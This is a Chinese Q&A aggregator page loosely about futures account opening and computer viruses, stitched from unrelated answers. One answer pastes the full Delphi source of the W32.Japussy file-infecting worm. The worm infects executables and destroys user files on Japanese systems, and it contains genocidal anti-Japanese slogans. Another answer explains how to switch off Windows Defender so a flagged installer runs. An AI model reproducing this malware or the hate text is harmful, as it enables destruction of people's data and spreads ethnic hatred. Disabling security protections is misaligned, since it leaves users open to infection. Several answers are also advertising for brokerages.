當前位置:首頁 » 期貨開戶 » 期貨開戶發病毒文件

期貨開戶發病毒文件

發布時間: 2021-11-07 10:32:52

1. 期貨開戶存在哪些法律風險

期貨開戶有銀行三方掛鉤,一般是不會有什麼風險的,錢是安全的,可以相信。

2. 您下載的文件包含木馬病毒,已成功隔離。。有點慌了 怎麼辦

已經隔離了,不用慌。

3. 期貨開戶的開戶風險

開戶需注意的風險?
交易投資者應須清楚明白買賣期貨及期權的風險後才能入市交易。交易所會員必須向客戶闡明期貨及期權的性質和風險。
並非每個投資者均適合買賣期貨及期權。投資者必須衡量其承擔市場波動風險或負擔虧損的能力。
投資者在充分了解有關風險之餘,應先征詢符合資質要求的期貨從業人員,讓他們分析期貨及期權產品是否適合您的個人需要,然後再做出買賣決定。
投資者在簽署有關文件和開戶買賣前,須仔細閱讀及領會有關風險揭示文件,該文件屬於客戶合同的一部分。

4. 常見的病毒文件名!

常見的病毒前綴的解釋(針對我們用得最多的Windows操作系統):
1、系統病毒
系統病毒的前綴為:Win32、PE、Win95、W32、W95等。這些病毒的一般公有的特性是可以感染Windows操作系統的 *.exe 和 *.dll 文件,並通過這些文件進行傳播。如CIH病毒。
2、蠕蟲病毒
蠕蟲病毒的前綴是:Worm。這種病毒的公有特性是通過網路或者系統漏洞進行傳播,很大部分的蠕蟲病毒都有向外發送帶毒郵件,阻塞網路的特性。比如沖擊波(阻塞網路),小郵差(發帶毒郵件)等。
3、木馬病毒、黑客病毒
木馬病毒其前綴是:Trojan,黑客病毒前綴名一般為Hack.木馬病毒的公有特性是通過網路或者系統漏洞進入用戶的系統並隱藏,然後向外界泄露用戶的信息。而黑客病毒則有一個可視的界面,能對用戶的電腦進行遠程式控制制。木馬、黑客病毒往往是成對出現的,即木馬病毒負責侵入用戶的電腦,而黑客病毒則會通過該木馬病毒來進行控制。現在這兩種類型都越來越趨向於整合了。一般的木馬如QQ消息尾巴木馬Trojan.QQ3344,還有大家可能遇見比較多的針對網路游戲的木馬病毒如Trojan.LMir.PSW.60。這里補充一點,病毒名中有PSW或者什麼PWD之類的一般都表示這個病毒有盜取密碼的功能(這些字母一般都為「密碼」的英文「password」的縮寫)一些黑客程序如:網路梟雄(Hack.Nether.Client)等。
4、腳本病毒
腳本病毒的前綴是:腳本病毒的公有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(.Redlof)。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其實宏病毒是也是腳本病毒的一種,由於它的特殊性,因此在這里單獨算成一類。宏病毒的前綴是:Macro,第二前綴是:Word、Word97、Excel、Excel97(也許還有別的)其中之一。凡是只感染WORD97及以前版本WORD文檔的病毒採用Word97做為第二前綴,格式是:Macro.Word97;凡是只感染WORD97以後版本WORD文檔的病毒採用Word做為第二前綴,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文檔的病毒採用Excel97做為第二前綴,格式是:Macro.Excel97;凡是只感染EXCEL97以後版本EXCEL文檔的病毒採用Excel做為第二前綴,格式是:Macro.Excel,依此類推。該類病毒的公有特性是能感染OFFICE系列文檔,然後通過OFFICE通用模板進行傳播,如:著名的美麗莎(Macro.Melissa)。
6、後門病毒
後門病毒的前綴是:Backdoor.該類病毒的公有特性是通過網路傳播,給系統開後門,給用戶電腦帶來安全隱患。如54很多朋友遇到過的IRC後門Backdoor.IRCBot。
7、病毒種植程序病毒
這類病毒的公有特性是運行時會從體內釋放出一個或幾個新的病毒到系統目錄下,由釋放出來的新病毒產生破壞。如:冰河播種者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破壞性程序病毒
破壞性程序病毒的前綴是:Harm。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒便會直接對用戶計算機產生破壞。如:格式化C盤(Harm.formatC.f)、殺手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前綴是:Joke.也稱惡作劇病毒。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒會做出各種破壞操作來嚇唬用戶,其實病毒並沒有對用戶電腦進行任何破壞。如:女鬼(Joke.Girlghost)病毒。
10.捆綁機病毒
捆綁機病毒的前綴是:Binder.這類病毒的公有特性是病毒作者會使用特定的捆綁程序將病毒與一些應用程序如QQ、IE捆綁起來,表面上看是一個正常的文件,當用戶運行這些捆綁病毒時,會表面上運行這些應用程序,然後隱藏運行捆綁在一起的病毒,從而給用戶造成危害。如:捆綁QQ(Binder.QQPass.QQBin)、系統殺手(Binder.killsys)等。以上為比較常見的病毒前綴,有時候我們還會看到一些其他的,但比較少見,這里簡單提一下:
DoS:會針對某台主機或者伺服器進行DoS攻擊;
Exploit:會自動通過溢出對方或者自己的系統漏洞來傳播自身,或者他本身就是一個用於Hacking的溢出工具;
HackTool:黑客工具,也許本身並不破壞你的機子,但是會被別人加以利用來用你做替身去破壞別人。

5. 「無法完成操作,因為文件包含病毒」是怎麼回事

問題分析:
1
這種情況是計算機自帶的反惡意軟體Windows Defender造成的,而在win8中的Windows Defender不僅是一款反惡意軟體,還是一款很好用的殺毒軟體。所以,只要出現這個提示,說明正在安裝的應用程序確實存在問題,有可能包含密碼竊取程序等。

END
解決方法:
1
如果用戶確實需要安裝此應用程序,需要設置Windows Defender不要啟用實時保護,或者停止Windows Defender應用,或者停止Windows Defender服務。
END
打開Windows Defender的方式:
1
打開控制面板,顯示類型為「圖標」打開所有控制面板選項,找到並滑鼠左鍵單擊Windows Defender。

END
具體操作:
1
設置Windows Defender不要啟用實時保護。
在『設置』選項卡下,點擊左側邊欄的『實時保護』,將『啟用實時保護』前復選框的勾去掉,點擊『保存更改』。

2
停止Windows Defender應用。
在『設置』選項卡下,點擊左側邊欄的『管理員』,將『啟用此應用』前復選框的勾去掉,點擊『保存更改』。

3
停止Windows Defender服務。
(1)打開控制面板,顯示類型為「圖標」打開所有控制面板選項,找到並滑鼠左鍵單擊管理工具。
(2)管理工具界面滑鼠左鍵雙擊服務。
(3)服務列表下,找到並滑鼠右鍵單擊Windows Defender service,選擇停止命令。

6. 我在國泰君安下載的期貨模擬交易 查出來有木馬病毒。。 我想知道國泰君安真的安全嗎 怎麼會有病毒啊

應該不會吧。。。是不是你電腦有什麼問題啊。。。

要不試試我們公司的?您可以和我說。

7. 期貨開戶時候,106960219621發來鏈接過來,安全嗎

首先你是否是在正規期貨公司開戶的,期貨開戶過程中沒有需要投資者點鏈接的地方。

8. 我今天收到一份國外客戶發來的scr文件,說是訂單,但是打開後360提示是病毒 然後電腦,就開始卡

你徹底中毒了,趁現在趕緊把重要的文件移動到c盤以外的其它盤里,然後執行全盤查殺,重新啟動後如果進不了系統,就直接重新安裝系統來解決,切記!!安裝系統前把c盤格式化一下再裝系統。
抱去電腦店裝機需要30---50元,雖然錢不多但是麻煩,不如用30---50元買個U盤自己裝系統,知識也學了機器也裝了,主要是方便了,而且自己又落個U盤,呵呵,何樂而不為。
以下是用U盤裝機流程,自己看看,學會不求人,而且自己更方便。
U盤裝系統:是把U盤裝個PE系統後,插在電腦上,可以用主板帶動U盤啟動,然後做系統用,主要是方便又可以更好的操作。
具體方法:去買個2.0U盤(3.0U盤要有驅動才行,裝機會容易失敗。),按下邊的去做即可自己裝系統了。
以下是U盤裝機流程: 以大白菜pe或是老毛桃pe為例,都一樣。
以下是U盤裝機流程: 以大白菜為例
准備未儲存文件的空U盤(建議使用8G以上U盤,注意:製作PE系統時會把U盤格式的),下載大白菜U盤裝機系統軟體,如果自己的電腦可用,就在自己的電腦上把U盤裝成PE系統,如果不好用到別的機器上製作成『大白菜』PE安裝軟體的U盤,即可開始裝機,把U盤插到電腦上後開機。
注意!此處很重要: U盤做好後首先要做的是: 電腦正常時或是到PE桌面時,要 備份電腦上重要文件,(主要有:桌面上的重要文件和我的文檔里的重要文件,拷到D盤里。)然後開始執行以下事情:
注意!如果電腦內存是4GB以上,則必須選擇64位系統版本,因為32位Win7系統最大隻支持4GB內存。
建議你,重裝系統前把C盤格式化一下再裝系統可解決硬碟有邏輯壞道問題。

1,先把WINXP、 WIN 7或是WIN 8鏡像下載到硬碟里或是預先做個GHO文件保存在U盤里,然後在除C盤以外的盤或者U盤根目錄里新建一個GHO文件夾,也可以在D盤根目錄下建一個GHO文件夾,然後把WIN7鏡像用UltarISO或者WinRAR解壓釋放到GHO文件夾中。
注意:切記注意不要在C盤中建GHO文件夾,那樣會再安裝過程中把GHO文件清掉而安裝失敗。
2,把啟動U盤插在電腦上,然後開機:
如果是新式UEFI BIOS,一般可以直接按F12進入到快捷啟動菜單,在菜單中選擇U盤名稱,即可從U盤啟動。
如果是老式BIOS,那必須按Del或F2等進入BIOS,然後在Advanced BIOS Features項目下,或者Boot,或者Startup下,找到First Boot Device或1st Boot Device等,進入後把USB-HDD或U盤名稱設為第一啟動,
具體方法看主板的說明書,或到網上搜索。
啟動U盤後,進入到這個U盤PE界面,選擇「運行Windows PE(系統安裝)」。
3,進入大白菜PE 或是老毛桃PE桌面後,選擇"WIN系統安裝器"這個桌面快捷圖標,雙擊運行。
4,彈出NT6快捷安裝器,首先就是要找到先前下載解壓出來的系統文件,點擊「打開」按鈕。
5,打開一個文件選擇框,找到先前在D盤建立的GHO文件或是的GHO文件夾,然後找到其子文件夾Sources,然後再在Sources文件夾下找到install.wim這個文件,這個就是安裝文件,選好後點擊「打開」按鈕。
6,然後選擇安裝分區,一般會默認為C盤,如果需要安裝到其它盤,那就要手動調整,如果是新手,最好不要去調整它,因為系統分區必須是主分區,而且必須是激活的,所以如果不了解這些最好不要去碰這個。
7,在這里,彈出安裝前最後一個確認窗口,仔細看一看,如果確定都選擇好了,就可以點「確定」,安裝開始。
8,這時系統會將GHO中的系統文件復制到C盤指定的地方,復制幾個G的文件會需要一定時間,請耐心等一等。
9,等復制完成後,彈出提示」請重啟動計算機進入安裝階段「,點」是「,電腦馬上重啟,這時就可以拔出U盤了,如果是UEFI BIOS,會仍從硬碟啟動,如果是老式BIOS,就必須進入BIOS中,把從U盤啟動改為從硬碟啟動。
10,重新從硬碟啟動後,進入電腦,就會開始安裝系統,如配置開始菜單,注冊組件等等,整個安裝過程所需要的時間會更長,一定要耐心等待。
注意!未安裝完成前禁止強制退出。 有幫助請採納下,選為滿意答案,謝謝!

9. 期貨網上開戶會有什麼風險,開戶賬號安不安全

期貨網上開戶如果遇到不正規的騙子網站,您的個人信息安全和賬戶資金安全都會受到威脅。如果你需要開戶要去正規的期貨平台開戶比如銀芝麻開戶網我就覺的不錯。正規的開戶網站開的戶都可以在證監會查看到。

10. 能發一個完整的病毒源代碼文件我分析一下。直接復制在這里就可以,不要發給我

復制的,希望採納
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒體的大小
IconOffset = $12EB8; //PE文件主圖標的偏移量

//在我的Delphi5 SP1上面編譯得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六進制字元串可以找到主圖標的偏移量

{
HeaderSize = 38912; //Upx壓縮過病毒體的大小
IconOffset = $92BC; //Upx壓縮過PE文件主圖標的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主圖標的大小--744位元組
IconTail = IconOffset + IconSize; //PE文件主圖標的尾部
ID = $44444444; //感染標記

//垃圾碼,以備寫入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函數聲明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系統標記
{ 判斷是否為Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之間復制 }
procere CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 將宿主文件從已感染的PE文件中分離出來,以備使用 }
procere ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO結構 }
procere FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 發帶毒郵件 }
procere SendMail;
begin
//哪位仁兄願意完成之?湯姆感激不盡!
end;
{ 感染PE文件 }
procere InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出錯則文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己則不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //檢查PE文件頭
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE標記
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //檢查感染標記
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主圖標(744位元組),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//頭文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//寫入病毒體主圖標之前的數據
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//寫入目前程序的主圖標
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//寫入病毒體主圖標到病毒體尾部之間的數據
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//寫入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//寫入已感染的標記
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替換宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 將目標文件寫入垃圾碼後刪除 }
procere SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性
FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //寫入垃圾碼的隨機次數
if Max < 5 then
Max := 5;
Mass := Size div Max; //每個間隔塊的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//寫入垃圾碼,將文件徹底破壞掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //關閉文件
end;
DeleteFile(PChar(FileName)); //刪除之
except
end;
end;
{ 獲得可寫的驅動器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str));
//得到本地磁碟和網路盤
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍歷目錄,感染和摧毀文件 }
procere LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目錄
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目錄
else Result := 2; //是根目錄
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調整消息隊列,避免引起懷疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可執行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,將Base64編碼後的病毒寫入
//感染瀏覽此網頁的所有用戶,這個是我最喜歡的!
//哪位大兄弟願意完成之?湯姆感激不盡!
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
else if Ext = '.ADC' then //Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
else
begin
if IsJap then //是倭文操作系統
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件後睡眠200毫秒,避免CPU佔用率過高引起懷疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '\', Mask);
FreeAndNil(SubDir);
end;
{ 遍歷磁碟上所有的文件 }
procere InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系統
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可寫的磁碟列表
Len := Length(DriverList);
while True do //死循環
begin
for i := Len downto 1 do //遍歷每個磁碟驅動器
LoopFiles(DriverList + ':\', '*.*'); //感染之
SendMail; //發帶毒郵件
Sleep(1000 * 60 * 5); //睡眠5分鍾
end;
end;
{ 主程序開始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注冊為服務進程
else //WinNT
begin
//遠程線程映射到Explorer進程
//哪位兄台願意完成之?湯姆感激不盡!
end;
//如果是原始病毒體自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和發郵件
else //已寄生於宿主程序上了,開始工作
begin
TmpFile := ParamStr(0); //創建臨時文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一個空格
ExtractFile(TmpFile); //分離之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //創建新進程運行之
InfectFiles; //感染和發郵件
end;
end

熱點內容
普洱墨江哈尼族自治縣晚秈稻期貨開戶 發布:2021-12-16 12:35:43 瀏覽:396
阿壩小金縣橡膠期貨開戶 發布:2021-12-16 12:35:40 瀏覽:908
楚雄大姚縣豆一期貨開戶 發布:2021-12-16 12:34:02 瀏覽:736
做期貨能在網上開戶嗎 發布:2021-12-16 12:32:22 瀏覽:591
安慶宜秀區早秈稻期貨開戶 發布:2021-12-16 12:32:22 瀏覽:377
正確的原油期貨開戶 發布:2021-12-16 12:29:41 瀏覽:39
達州市纖維板期貨開戶 發布:2021-12-16 12:25:11 瀏覽:310
呼倫貝爾新巴爾虎左旗白銀期貨開戶 發布:2021-12-16 12:25:07 瀏覽:883
上海外盤期貨哪裡開戶 發布:2021-12-16 12:24:10 瀏覽:448
香港日發期貨開戶網站 發布:2021-12-16 12:24:09 瀏覽:780